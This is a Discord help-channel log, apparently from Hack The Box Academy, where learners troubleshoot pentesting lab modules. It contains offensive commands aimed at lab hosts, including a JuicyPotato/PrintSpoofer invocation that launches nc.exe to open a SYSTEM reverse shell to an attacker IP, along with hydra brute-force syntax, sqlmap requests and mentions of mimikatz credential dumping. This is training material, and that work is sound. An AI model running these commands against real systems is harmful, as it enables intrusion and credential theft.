#modules

1 messages · Page 225 of 1

heavy edge
#

the windows machines when rdping into them are very unstable

#

ive dc'd 30 times today alone

desert cypress
heavy edge
#

yeah the jitters on us 1 2 and 3 are all over ping times are anywhere from 100ms to 1800

desert cypress
#

yes I have the same thing, it's unusable

#

Have you found a way to solve it?

heavy edge
#

i swap between servers

desert cypress
#

I've tried and it doesn't solve the problem

shut quest
#

US1 / Whatever windows box I currently am on - Though I find it to be certain boxes more so than others

heavy edge
#

us 1 and 2

#

us 1 rn

desert cypress
#

I will retry

heavy edge
#

ssh yeah see what the difference is for us 2 or 3

desert cypress
#

both are horrible

heavy edge
#

eu?

desert cypress
#

it's a little bit better, but as slow as ever

#

the real question is, what does htb do?

heavy edge
#

wot

dire abyss
#

idk what hero is on or saying exactly but damn my times are high.. tcp us 3

#

i like tcp for stability but im gonna switch to udp

forest tree
#

How can i download katana for kali linux?please help me

heavy edge
lucid sluice
#

Im stuck.
msf return session exploit comple but no exploit created i only had to fill one option and it was the RHOST from what I understood trough the lecture... help pls.

next bronze
#

unless you're using a bind shell, you also need to set the LHOST, make sure that's on the same subnet as the target

dire abyss
#

trying to upload a file using PS (target host) to py http server on my attack host, but this command isnt working.. method is unsupported.
"Invoke-RestMethod -Uri http://10.10.14.13:8000 -Method Post -InFile C:\Tools\20240325182442_ILFREIGHT.zip -UseDefaultCredentials"

#

im dumb.. removed "-method" and changed infile to outfile

cloud urchin
dire abyss
cloud urchin
dire abyss
#

yes

lucid sluice
dire abyss
#

/drive:drive,/home/name/dir ?

cloud urchin
# dire abyss yes

in kali type 'smbserver.py -smb2support share .', and then in windows open explorer and type \\<your tun0 ip>\

visual fable
#

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.

I need some help for that, what I have done filter the C2 IP, and Compromised Machine IP with some rulename, but none of the port is right

dire abyss
#

for whatever reason thats preventing me from rdp'ing to the target

next bronze
dire abyss
#

i can locate the file but its in the impacket dir

cloud urchin
#

welp i guess it's impossible to use if it's in another directory

dire abyss
#

do i have to run it from that that dir?

cloud urchin
#

you can run it from whatever dir you like

dire abyss
cloud urchin
lucid sluice
#

i also tried to change the lport to 445 only for it to fail

next bronze
#

is 10.129.106.194 your tun0 ip? that looks like the target ip

lucid sluice
cloud urchin
hot grove
#

thats how it be sometimes

dire abyss
dire abyss
cloud urchin
cloud urchin
#

there are plenty of ways. smb server is nice because you can just use the gui to cut/paste

dire abyss
next bronze
#

http is probably better, works across both windows and linux, easy to pivot with

cloud urchin
dire abyss
cloud urchin
#

oh there's also scp

dire abyss
cloud urchin
#

SCP relies on ssh, so you could if you installed ssh on windows, but you can scp from windows to linux

#

powershell has ssh built in, but windows isn't running ssh as a service typically

dire abyss
#

alright right now im rolling with HTTP method with PS. it looks like i grab the file with http.server on my attack host but i dont see it on the directory im in... where is the file going

#

10.129.230.228 - - [25/Mar/2024 19:20:40] "GET / HTTP/1.1" 200 -

#

Invoke-WebRequest -Uri http://10.10.14.13:8000 -OutFile C:\Tools\20240325182442_ILFREIGHT.zip -UseDefaultCredentials

cloud urchin
#

nice, use that

dire abyss
#

gonna have to make a ton of notes here, thanks fellas

short hare
#

Has anyone completed the Session Security: Skill assessment

Need some serious help in this..!

I found the admin cookie value but when using it to get to the admin session it gives error as minilab.htb.net?error=noauth, whereas in section Obtaining Session Identifiers without User Intersection section the same method is working

Months back one guy used the same cookie copy and pasting method and it worked
Now it's not. I am really having no idea

short hare
idle cliff
#

Anybody available for a question on AD Enumeration and Attacks Skills Assessment 2? I'm trying to figure out if it's a technical problem with the lab or of I'm just not using the correct tool

shut quest
#

What's the question?

idle cliff
#

I've got creds but can't seem to get any remote connection to work with xfreerdp etc

#

wmiexec or anything

short hare
idle cliff
#

Nope

#

tried everything crackmapexec, evil-winrm, xfreerdp, ssh, reminna

cloud urchin
#

do you get a little [+] showing the creds work with cme? rdp isn't always enabled, but i don't know about that specific box.

little bear
#

It feels odd forcing myself to take the rest of today off after this section I solved, lmao

Back to the grind tomorrow. How were the PrivEsc Modules? I'm looking forward to them 😄

shut quest
idle cliff
#

I've tried the creds on all the IP addresses I have, thats why I'm wondering if I'm encountering a technical problem or just missing something

cloud urchin
#

so no?

idle cliff
#

Didn't see your question. I get nothing returned when using crackmap exec, no errors or anything. The command executes and then nothing.

idle cliff
#

Skills Assessment 2, question 3

cloud urchin
#

or hitting the wrong ip

#

i've only seen CME not return any results at all if the IP i'm targeting isn't up, wrong ip, or not connected to vpn

idle cliff
#

That's the weird thing, it does this with all the IPs that I have access to. I've pinged and tested they're all up

crystal steeple
idle cliff
#

xfreerdp doesn't connect

cloud urchin
#

and what's the error

idle cliff
#

brings me to an Xorg sign in screen

cloud urchin
#

so a linux box?

idle cliff
#

I'm trying to connect from the attack box

crystal steeple
#

Can u show the screen/error you getting?

cloud urchin
#

yeah xfree says the error every time

#

plus cme not showing results indicates network problem, be it not connected, wrong ip, something like that

idle cliff
#

If it was the wrong IP, why would it do it with all 3? That's what I"m wondering

cloud urchin
#

because you have something wrong with the network stuff

#

you still haven't shown the ip's or errors

#

show the box's ip address, show the command

#

pretty simple

#

i can't think of any other reason cme would not show any data. if you hit a box it can't auth to, it tells you. if you auth to it, it tells you. if it shows nothing, you aren't targeting the right thing or simply can't find a route to that ip.

#

those are the only 3 things that happen when you use cme, so saying there is no output indicates a network problem of some kind

crystal steeple
idle cliff
#

Waiting for the session to spin up. I terminated and am restarting.

#

Not sure why it's taking so long to spawn a target

cloud urchin
#

do you have a web proxy on? try refreshing the page

idle cliff
#

Nope. I'm wondering if it's a HTB network thing. I refreshed the page already

outer urchin
#

I can't get one to spawn either. Tried US servers and canada

idle cliff
#

This probably answers my questions. I know the IPs aren't wrong, I've used crackmap exec a thousand times and never got zero response from it before at all, or at least that I can recall

#

I'll take another shot at it tomorrow, and update ya'll then

fast badger
#

some help me withe the best command to Configure the network settings for your LXC container on my PWbox .. I tried this command {sudo lxc-config -n linuxcontainer -s network} but came out with an error message.... URL : https://academy.hackthebox.com/module/18/section/2097

acoustic owl
#

You better ask this question here in #homelab-sysadm It has nothing to do with the Academy
If you have no access, read and follow #welcome

fast badger
fast badger
knotty crag
#

guys pls help me

#

i am the guy from yesterday

#

i still cant get the open vpn working pls help

#

like i successfully connect to the vpn but i am not able to ping /scan the target machines apparently

#

can i get any help

next bronze
#

you should contact support

compact patrolBOT
knotty crag
#

thank you

knotty crag
#

guysi am not able to contact

#

pls help

slate halo
#

im doing the Attacking SAM but I my answer is not being accepted for the SAM DB location which is C:\Windows\system32\config\SAM any ideas?

soft cedar
#

read the question very well.

sterile vigil
#

NTLM Relay Attacks- Skill Assessment, Q3: Submit the password of the SQL user 'sqlftp'.

I have pawned BACKUP01, I can see txt file "sqlftp test.txt". I dump ldap info about Domain Users and I know about dod, mozah, sqladm etc. I changed the content of the sqlftp test.txt file to:
[Shell]
Command=2
IconFile=\172.16.119.20\tools\nc.ico
[Taskbar]

I don't get the ntlv2 hash from any new user. I have the password for sql_ftp_test but I can't log in anywhere. Please help !!!

next bronze
#

check what you can access with the creds you have, maybe some shares

strange spindle
#

I've been beating my head against the wall trying to figure out wtf is the problem here. What am I doing wrong?

next bronze
#

that's not how you use it after you've imported it, read the section again

steady dust
#

Some ideas for Windows Privilege Escalation -Further Credential Theft? I found the credentials for sa and tried everything in the module.

#

But no success and run out of ideas.

royal sigil
#

hello anyone completed the introduction to c#

#

because i have problem with the section librairies im not able to import librairies

royal sigil
#

yeah

fringe urchin
#

yesterday stopped at SHELLS & PAYLOADS /
Automating Payloads & Delivery with Metasploit
and today i read through the Infiltrating Windows module (havent yet started the questions).
so my question is why do those two modules want you to drop into system shell with "shell" command?
as far as i saw it you dont really have auto complete etc on the system shell, and on meterpreter it worked fine moving through the files/directories. like example:

so isnt it better to just stay at the meterpreter?

next bronze
#

sometimes you'll need to use native windows commands, meterpreter won't have those

fringe urchin
#

understandable thanks, is there a way to make them more functional the shells? with autocomplete etc? like example with nc you can just do python3 -c 'import pty; pty.spawn("/bin/bash")' etc?

#

to upgrade tty

next bronze
#

not with msf afaik, you can send a revshell with that if you want

fringe urchin
#

okey yea i meant with msf, okey ty for the help KermitLoveHeart

icy hazel
#

Hi guys, I'm currently stuck on Suricata Rule Development Part 2 (Encrypted Traffic) | Working with IDS/IPS, on this question: "There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer." Any help would be great 🙂

heavy edge
sharp quartz
#

hey
guys i have question
can anyone help me ??

fringe urchin
sharp quartz
#

in the network enumration with nmap and in the last section lab hard one lab can anyone help figure it out ?

fringe urchin
soft cedar
sharp quartz
#

ye i tryin useing nmap -p- but its taking to long for scanning for the hights port

soft cedar
#

review the firewall and ids section.

fringe urchin
sharp quartz
#

ye i use nmap -p- -Pn -D RND:5 <ip>

#

is that right for that ?

soft cedar
heavy edge
sharp quartz
#

what is that ?

heavy edge
#

Yeah if you are in a command shell then you need to run command shells you could ideally run the post shell-to-msf

fringe urchin
heavy edge
#

Because you weren’t in a meterpretee session. At that point run the post/shell_to_meterpreter module

soft cedar
heavy edge
#

Which is weird tho because usually with exploits they go straight to meterprester sessions

sharp quartz
#

can you give me the section name again ?

slate halo
#

im doing the Attacking SAM and whem im doing the move sam.save \10.10.15.197\CompData im getting access denied

sharp quartz
#

tnx

heavy edge
#

Run it as admin

#

You should have read that bob is a local admin

slate halo
#

im running cmd as admin

versed relic
#

Hi guys I’ll need help with starting point, I’m stuck on Appointment in tier1 it’s about using gobuster, I found the wordlist location but there is not such a directory list-2.3-small.txt

#

Using parrot os

fringe urchin
heavy edge
#

Did you@run it through meterpreter

fringe urchin
heavy edge
#

Interesting. I wonder if av was flagging it

fringe urchin
sharp quartz
#

hey

fringe urchin
#

Maybe reseting would have helpedkek

sharp quartz
#

i try to do spoof ip address from the attack box but its not working

#

can show me some examples for the spoof source ip address ?

#

hey cant figure it out can you help me

#

i do everything but i find the highest port 49154 but i dont know what to do

#

i try --source-port for scanning from this port but nothing showed up

soft cedar
#

maybe thats not the port you are looking for

sharp quartz
#

can give me the nmap command ??

#

im stuck

soft cedar
versed relic
#

Hi guys can anyone please help me with that task? Idk the location of the file called small.txt for go buster. I’m using parrot os. I have checked the se lists are in /usr/share/wordlists/seclists but I can’t find that specific file

sharp quartz
#

i run nmap -sT <ip>

#

is that right ??

soft cedar
sharp quartz
#

okey i will run that see whats happen

sharp quartz
#

its take 54 minutes do you think its okay ??

soft cedar
sharp quartz
#

so what can i do ??

soft cedar
#

you wait xd.

#

just make sure you have all the necessary flags.

sharp quartz
#

i take the -T to 5

#

is it okey ??

fringe urchin
soft cedar
sharp quartz
#

okey

soft cedar
sharp quartz
#

sudo namp -p- -sT <ip> -Pn -n --disable-arp-ping -v -D RND:5

fringe urchin
#

Doesnt it block without Source port?

versed relic
#

@fringe urchin it’s says locate command not found

soft cedar
next bronze
#

should provide the relevant section and hints on the flag to get the answer, just straight up providing commands doesn't help anyone imo

sharp quartz
next bronze
sharp quartz
#

it show black screen

sharp quartz
#

okey i got taht

fringe urchin
cloud urchin
#

lol just gonna delete that in case someone tries it

fringe urchin
next bronze
versed relic
fringe urchin
rancid aurora
#

no crash you try

next bronze
#
find / -type f -name 'directory-list-2.3-small.txt' 2>/dev/null`
versed relic
#

That’s what I’m looking for

heavy edge
#

Put this guy thru the intro to Linux section

#

Holeeeeeey

fringe urchin
autumn pilot
shadow current
#

https://academy.hackthebox.com/module/67/section/637
Windows Privilege Escalation Skills Assessment - Part I

I got a reverse shell already now im trying to escalate my privelege to admin or nt authority so im used juicypotato and printspooler but i failed to get a connection to my netcat listener on local host.
this error appear everytime i run printspoofer.exe

PS C:\Users\Public\Downloads> .\PrintSpoofer64.exe -c "c:\tools\nc.exe 10.10.14.157 8443 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

next bronze
#

juicypotato should work, did you look at the options?

steady mulch
#

I NEED HELP

#

HELP IS WHAT I NEED

#

IM IN FFUF MODULE AND CAN'T FIND EXTENSIONS

steady dust
#

Call 911

slate halo
next bronze
#

are you trying to transfer the save?

steady mulch
#

i only get .php

slate halo
#

i cannot move all of the files

next bronze
#

did you set up the smb share?

shadow current
slate halo
soft cedar
steady mulch
#

im not stupid ok?

#

anyway i tried it again and it worked for some reason idk

soft cedar
steady mulch
#

what?

heavy edge
heavy edge
#

With the examples, they’re just there to show you how it’s done. You need to cater the example to your own system and make adjustments accordingly. Or else you’ll never be able to connect.

steady dust
#

Is there any option to make the machine from Citrix Breakout to run better?

rocky perch
#

for page 1 windows event logs and finding evil the question are not right the 2nd question i cannot complete

tawdry vapor
#

anyone can help me with weak permissions in the windows privilege escalation module?

split pelican
#

why does npm init -y not work?

open snow
#

are connections to hosts extremely slow in eu-1/2?

astral inlet
#

hi, EU vpn problems ?

abstract dirge
#

why no results

cloud urchin
brazen saffron
cloud urchin
#

oh i see your spoiler one sec

#

it's in the module there, under custom sqlmap requests

brazen saffron
#

I tried these cmds :

  • ||sqlmap -r request2 --data="id=1"||
  • ||sqlmap -r request2 --cookie="id=1"||
  • ||sqlmap -r request2 --cookie="id=1*"||
  • ||sqlmap -r request2 --cookie="id=1*" --method GET||
  • ||sqlmap -r request2 --cookie="id=1*" --method GET --data='id=1'||
cloud urchin
#

or, you can copy it into the curl command

brazen saffron
cloud urchin
#

DM me the curl command you put into sqlmap

brazen saffron
#

As a file.

cloud urchin
#

k well dm me the command you used

cloud urchin
#

ok, and what was the result

#

did you get an error or did the command go through successfully

brazen saffron
#

Errors, similar to this.

#

Speaking about crawl but I tried with and nothing...

cloud urchin
#

i'm going to need to see the full command like i said.

brazen saffron
#

Just using a file, samething.

#

But if you want :

cloud urchin
#

ok dm me a screenshot of the command if you want my help

#

if your commands you put in here don't work then you messed something up getting the request

#

i was able to use the curl method

brazen saffron
#

||curl 'http://94.237.57.59:45757/case3.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8' -H 'Accept-Language: fr' -H 'Cache-Control: max-age=0' -H 'Cookie: id=1' -H 'Proxy-Connection: keep-alive' -H 'Sec-GPC: 1' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
--insecure ||

cloud urchin
#

your command is missing some flags

brazen saffron
#

???

cloud urchin
#

you're not specifying the cookie

brazen saffron
#

Yeah I know but I tough you were speaking about the curl xd.

cloud urchin
#

in your sqlmap screen shot

brazen saffron
#

I fixed dw.

#

Just wanted to see, but why it was not working??

cloud urchin
#

did that work for you?

#

i'm not sure why, i think you copied the request wrong or something

brazen saffron
cloud urchin
#

works fine with copying via curl

brazen saffron
cloud urchin
#

idk i'd have to see a screenshot of the command

#

you didn't specificy the cookie in that last one even though you said you did in the commands

#

or it could be your process of getting the request i really don't know

#

i would have to see exactly what you're doing for that

brazen saffron
#

The first, I force cancelling to try with the request file.

#

Then the second is with the file.

cloud urchin
#

not sure, don't know sqlmap well enough for that. were you able to do it with the copy to curl method?

dreamy solar
#

Hello Help me I use procdump I have a lsass.dmp and a I use mimikatz I have this plz help me ^^"

low vine
#

CWEE ---> JWT tokens section "Attacking Authentication" I've run the jwtcrack tool and I'm getting no response, it finishes but htere is no output

#

feel like im just really misunderstanding some really simple shit so a nice smack on the head would be nice 🙂

#

nvm i see they give you a JWT ><

dreamy solar
brazen saffron
storm hedge
#

Hello, I have a question regarding AD.
Is the krbtgt msds-supportedencryptiontypes attribute used to select the TGT encryption type?

brazen saffron
#

About SQLMap, does there is a risk if we use level 5 or no?

topaz zenith
#

Hi guys, I'm doing the Linux Privilege Escalation Module - LXD. And I have gained root through the container and am looking for the flag.txt file, currently running grep again at the moment. Is there something I am missing? running grep -r -l 'HTB{' /, but idk why when I grep for flag.txt it says it doesn't exist so not trying to waste anymore time searching if I may not be understanding what I should be doing lol

fathom pendant
#

Well the flag might not have the HTB{} and usually the root flag is in the root directory /root

#

Also did you try to find flag.txt

topaz zenith
#

~ # cd /root
~ # ls -l
total 0

dim wolf
#

ain't /root the home folder for root

topaz zenith
#

yes

dreamy solar
#

Wtf ^^" ?

fathom pendant
#

You say "grep" but you don't "grep" a filesystem for a filename, you use locate/find

topaz zenith
#

tried both of those

fathom pendant
dim wolf
#

shit i must be thinking crooked

dreamy solar
fathom pendant
#

Then you might not need the ./

#

Especially since you're in the file location

dreamy solar
#

ah yes thanks

topaz zenith
#

im using bin/sh, won't let me use locate

fathom pendant
#

Find is still a command

#

Also it could be in a hidden directory

#

So ls -l doesn't show everything

topaz zenith
#

ls -a does

#

I found it, modified my find command. Thanks, just wanted to make sure I wasn't in the wrong place for some reason or using the wrong shell or whatever lol

blissful meteor
#

can any one help me

fathom pendant
#

No, you're alone, no one can help you

#

It's always best to at least say what you need help with

blissful meteor
#

any haceker can avilablie

vale anvil
#

Hi guys, i've been struggling for more than a reasonable amount of time on AD Enumeration & Attacks / Skills Assessment Part I regarding the retrieval of a cleartext password. Would anyone please be able to help ? 🙏

fringe urchin
blissful meteor
#

and my server also

#

🥺

fathom pendant
#

Nothing we can do for you my dude

blissful meteor
#

im send 100+mail

fathom pendant
#

If you got hacked there's a nonzero chance you downloaded and ran something you weren't supposed to

fringe urchin
#

Just an example:
You acc got hacked since you probably dowloaded somethinf and there was a discord tokem stealer in boom your acc gone. We cant.magicly just hack your account lol

blissful meteor
#

idk

fathom pendant
#

In fact, as someone that's worked IT, it's just annoying

#

It's a process: support gets your message -> an agent/team gets assigned to investigate -> they reach out to provide more info to ensure you are the owner of the account

blissful meteor
#

this is my alt acc

fathom pendant
#

Ok, we do not care

#

We literally can do nothing for you to get your account back

blissful meteor
#

why

fathom pendant
#

Uninstall anything you may have installed recently

fathom pendant
blissful meteor
#

ahh ok

#

ah but what is this server do

fathom pendant
#

Reading the #welcome channel can help you find that out

#

If you can't be bothered to read: leave

blissful meteor
#

can i learn this

fathom pendant
#

But this boils down to: you downloaded something, likely a "cracked" software that ran a token stealer

#

Which bypasses any login stuff

#

Meaning even if you had 2fa, it doesn't matter

fathom pendant
blissful meteor
#

noproblem

#

i need to larn hacking

fathom pendant
#

And if you wanna hack discord, be prepared for the police to knock at your door

fringe urchin
#

It wont teach yiu how to hack someinw discord tho

fathom pendant
#

Nope

blissful meteor
#

lol

fathom pendant
#

There's no course within HTB that will teach you how to specifically hack discord

fringe urchin
#

Or any other social media

fathom pendant
#

Because, to circle back, that's illegal

blissful meteor
#

ok den byee

#

everyone

fringe urchin
#

👋

fathom pendant
#

Its not gonna be a directly plaintext password

vale anvil
# fathom pendant Its not gonna be a directly plaintext password

according to what can be found on htb forum it should be readable directly in plaintext using the right options in mimikatz. I think i tried them all without success. I finally (like 2mins ago) was able to see the cleartext password in a weird kinda memory dump in Lazagne output but I would love to know how to get it via mimikatz

fathom pendant
#

I think I did lsadump with mimikatz ¯_(ツ)_/¯

vale anvil
#

yep i tried is a well, but nothing at all regarding the targeted user..

fathom pendant
#

plenty of ways but I don't recall it being in plaintext ¯_(ツ)_/¯

#

I remember needing to do some cracking however

vale anvil
#

I just found the right command, its in cleartext indeed 🙂

#

thx !

storm hedge
#

Anyone regarding my question please?

fathom pendant
#

Your question got drowned out as it didn't seem related to a module, and other people were getting assisted

next bronze
#

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797

TGT encryption type – As mentioned before, a TGT is only read by domain controllers in the issuing domain. As a result, the encryption type of the TGT only needs to be supported by the domain controllers. Once your domain functional level (DFL) is 2008 or higher, you KRBTGT account will always default to AES encryption. For all other account types (user and computer) the selected encryption type is determined by the msDS-SupportedEncryptionTypes attribute on the account. You can modify the attribute directly or you can enable AES using the checkboxes in the Account tab.

storm hedge
#

@next bronze I read it but I didn't not understand it because at point it says the user account attribute is used and another point it refers to the Krbtgt account

cloud urchin
#

The msDS-SupportedEncryptionTypes attribute uses a single HEX value to define which encryption types are supported.

#

this means is containes a value that tells you what is supported, not what is selected

storm hedge
#

I understand that for TGS the user account is used but I'm not sure for the TGT

#

@cloud urchin yes, that I know but my question is related specifically to the encrytion algorithm for the TGT

cloud urchin
#

your question was that attribute dictating the encryption type

#

the answer is no, it tells you what's supported

cloud urchin
#

"Is the krbtgt msds-supportedencryptiontypes attribute used to select the TGT encryption type?" the answer is no.

storm hedge
#

But in the same document it says that if I want to restrict what encryption algorithms aee supported I change the attribute of the krbtgt account and then restart the controller

cloud urchin
#

yeah and?

#

and that's not contradictory

fathom pendant
#

Yeah thats not a contradiction

#

Its literally a switch that says "support these encryption types"

cloud urchin
#

The encryption selected is based on several factors, it's a result of the negotiation process between the client and the KDC, considering their capabilities, the ticket policy settings, and other config settings... it picks the strongest one between them all

#

look at it this way, your car has 4 seats and can support 4 people. does that mean your car dictates how many people are going to be in it?

#

no it just means that's how many people you can fit in there

storm hedge
#

So the supported encryption types is based on the krbtgt attributes and the user account attribute?

cloud urchin
#

No..

#

supported encryption type simply means it can use those particular encryptions

fathom pendant
#

^

storm hedge
#

If I want to know what encryption types are supported for a user account for the TGT, what attribute is relevant?

#

My english is not good sorry

cloud urchin
#

supportedEncryptionTypes...

storm hedge
#

Ok, of the user's account or of the krbtgt account?

fathom pendant
#

Tgt says: this is what I support

#

And user says "OK, I'll encrypt the strongest of these options"

storm hedge
#

@fathom pendant, ok, that's what I understood, that for the TGT it's based on the krbtgt account and for the TGS it's based on the user's account properties.
Is that correct?

cloud urchin
#

no

#

you need to understand the supportedEncryptionTypes attribute is associated with the KDC, the key distribution center. the KDC is responsible for issuing BOTH the TGS and TGT tickets for services.

#

you should take the kerberos course you'd love it lol

storm hedge
#

Yes, for the TGS the encryption key is based on the user's password and the available encryption type for the TGS is based on the account properties or the default properties set on the domain controller.

cloud urchin
#

nah

#

its how i said earlier

fathom pendant
#

The KDC dictates what can/can't be used in encryption, and sets those rules for the TGT/TGS

cloud urchin
#

if it was based on the user's choice that'd be a huge security problem

fathom pendant
#

KDC sets the value which gets passed to their respective parts

storm hedge
#

@cloud urchin I didn't say it was based on the user's choice but for the TGS the supported encryption types are set on the user's account stored on the domain controller.
I'm setting an environment now to do some tests

#

@fathom pendant the KDC select from the list of supported algorithms provided by the client.

next bronze
#

I thought the article is pretty clear thonk

storm hedge
#

@next bronze probably but my english is weak, so most partq were clear, the part about the TGT wasn't.
Sorry for the disturbance

mild cypress
#

Not sure why neither of these result in a reverse shell 😦

||

PS C:\tmp> .\JuicyPotato.exe -l 1337 -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}" -p C:\windows\system32\cmd.exe -a "/c c:\ProgramData\nc.exe <IP> <PORT> -e cmd.exe" -t * 
Testing {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 1337
......
[+] authresult 0
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

||
||

PS C:\tmp> ./PrintSpooler.exe -c "c:\tmp\nc.exe <IP> <PORT> -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

||

Update: ||Kept trying lots of different CLSIDs from the list and eventually one worked, though there was no difference in the output of running the command 🤷 ||

shadow current
mild cypress
#

Oh really? That's the response for an incorrect CLSID? I was getting errors before 🤔

shadow current
compact halo
#

ICMP Tunneling with SOCKS
Several issues with this module: -- I will name the most prevelant --

  1. Issues with the vm fully loading
  2. ssh keeps kicking me out
  3. Issues getting the ptunnel-ng running properly from my own vm - THe issue of missing a module so the ptunnel won't run unless I compile if from the HTB vm. FOund this out during research
  4. Used the HTB vm and I keep getting kicked out of the ssh session. My commands are correct.
  5. Does anyone have a workaround suggestion for this porblem?
#

GOt it working for a sec and then it dropped the rgp window again - this is after a few resets - not stable

fathom prairie
#

Currently im trying to crack SSH with a mutated password list of Kiras password, but this seems like a too roundabout (and lengthy) way of doing things

#

So im probably not approaching it right

#

DM me or TAG me here please!

sly moon
fathom prairie
#

which one are you talking abnout?

sly moon
unborn herald
#

I'm doing the Footprinting module (Section: FTP). I'm stuck on the second question. Could someone provide a hint/advice?
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer. I don't have the password or creds to login to ftp..

cloud urchin
unborn herald
cloud urchin
#

If it's asking for root's password, that means you're logging in as root

fathom prairie
#

But what do I do with this?

#

I thought Kiras password was asssumed to be some variation of Loveyou1

cloud urchin
unborn herald
fathom pendant
cloud urchin
#

omg finally got that CORS misconfiguration question

fathom pendant
#

Was it something goofy?

heavy edge
#

the linux ptt section makes my head hurt

fathom pendant
#

It's fun

cloud urchin
fathom pendant
#

Just... using tools makes it faster to find

fathom pendant
#

So lots of digging and throwing shit at it

cloud urchin
#

yeah i could not figure out why my code didn't work.. i took a closer look and figured it out though. ofc. lol.

#

that's how they get you here

heavy edge
#

just reading it my head isliek huh

fathom prairie
heavy edge
#

then it goes into port forwarding

heavy edge
fathom prairie
heavy edge
#

no i did that section

fathom prairie
#

I already did the mutated password lesson, and I already found out her password using a mutated version of that hint

heavy edge
#

okay

fathom prairie
#

Im talking about this one " Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
"

heavy edge
#

oh

fathom prairie
#

The password I found during the mutated password lesson doesnt work for this part

heavy edge
#

youll have to find a different one then

fathom prairie
#

So Im like... How do I do this

heavy edge
#

look for hashes somewhere

fathom pendant
fathom prairie
fathom prairie
fathom pendant
#

I believe you also find her password for the credential hunting in linux section to get to will

fathom prairie
#

This part?

heavy edge
#

im so lost my guy

fathom pendant
fathom prairie
#

I found the right password for that using SMB crackmapexec, but it doesnt work here

fathom pendant
#

Take this as a lesson to always save creds you find

fathom prairie
#

Unless the SMB one is the wrong one and its different

#

To be clear Im supposed to use SSH to log in right?

fathom pendant
#

What is the error you get with ssh

#

Is it wrong password or blah blah blah (publickey)

fathom prairie
#

Permission denied

fathom pendant
#

Then the password youvhave for her is wrong

#

Her password is a variation of LoveYou1

fathom prairie
#

The password I have for her I got from the section with Credential Hunting

#

I got it off SMB

#

I have a variation of LoveYou1

heavy edge
#

why is the pw not working

fathom prairie
heavy edge
#

WHAT THE FUCK

#

THATS HIS ACTUAL USERNAME?

crystal steeple
heavy edge
#

WHO DOES THAT

cloud urchin
#

wrong person sorry

crystal steeple
#

why you trying to ssh without id_rsa?

heavy edge
#

but that USERNAME

fathom prairie
fathom pendant
#

Delete that byw

crystal steeple
#

the pw you found should be a passphrase to enter when using the cracked id_rsa not the kira pw

fathom prairie
cloud urchin
fathom pendant
#

Gimme a sec though while I sanity check

heavy edge
cloud urchin
#

kk

heavy edge
#

his username is actually david@inlanefreight

#

so its ssh david@inlane@ip -p

fathom prairie
fathom prairie
crystal steeple
fathom pendant
heavy edge
#

imma just start taking htb literal on everything they say

fathom pendant
heavy edge
fathom pendant
#

Ya dingbat they're trying to log in to grab it

fathom prairie
heavy edge
#

sadglas i knew that

fathom prairie
fathom pendant
#

^

fathom prairie
#

My head is spinning Im gonna faint

fathom pendant
crystal steeple
fathom pendant
#

Note things may appear hidden at first

fathom prairie
#

Ok give me one second, maybe the SMB crackmap is a false positive

fathom pendant
#

I mean her password for logging in is the same from the earlier section

fathom prairie
#

The problem is that I took a week break

#

So I forgot all the passwords and I didnt save them ;~;

fathom pendant
#

Well: this is why you save creds

#

Take it as a harsh lesson

fathom prairie
#

Yes.. A very time consuming lesson

fathom pendant
#

but you won't make the mistake again ¯_(ツ)_/¯

fathom prairie
#

Sadness

#

Can crackmapexec not read .list files?

fathom pendant
#

It can

fathom prairie
#

Then uh... Whats this about

fathom pendant
#

Lowercase k btw

fathom pendant
#

It's showing the not-positive results

fathom prairie
#

All the results arent positive

#

But whats with the NonType object

fathom pendant
#

Don't worry about that

#

Point is: it didn't log in

fathom prairie
#

So FTP is a no go?

fathom pendant
#

It can be a go

#

Literally all It's telling you is it didn't auth with those creds, so that combo isn't good

#

Those aren't errors

fathom prairie
#

Wasnt the password a mutation of LoveYou1 though

fathom pendant
#

Yes

fathom prairie
#

The list I put it in a mutation of LoveYou1 using the custom rule they gave

fathom pendant
#

You're attacking a linux device: casing is important

fathom prairie
#

Same result for Kira and kira

fathom pendant
#

Weird

fathom prairie
#

Lord save me

#

So uhmmm anymore ideas

#

Before I tear out my hair

crystal steeple
#

can u tell me where did you find the kira password? in what section exactly so i can try to re do the question

fathom prairie
#

I did some sections about a week ago and then took a break

#

and then I came back to see it asking to use the credentials

#

but I forgot them

fathom pendant
#

But it was never the answer to a question

#

You can also use hydra

fathom prairie
#

What was the syntax for that?

fathom pendant
#

-t 48 is the most stable

fathom prairie
#

or something like that?

fathom pendant
#

hydra -l username -P list service://ip -t <threads>

fathom prairie
#

🙏

fathom pendant
#

Btw each module has a cheat sheet you can reference for command syntax

fathom prairie
#

Right forgot about that

#

Hydra got me a different password than crackmap

#

Oh lord thank you

#

I can finally continue my journey after ten long years

fathom pendant
#

👍

#

If one tool doesn't work: try another

fathom prairie
#

Does crackmap have a problem with or something

fathom pendant
#

No

fathom prairie
#

It was the same password as crackmap except they were missing that at the end

fathom pendant
#

It's likely after a bit that the ftp server was just overloaded

fathom prairie
#

oh

fathom pendant
#

So it just auto-rejected everything thrown at it, correct or not

fathom prairie
#

Good to know

#

Thank you 🙏

fathom pendant
#

Also it looks like smb is a "trap" as it accepts any username/password combo so it'll just spit out a positive no matter what

zinc mason
#

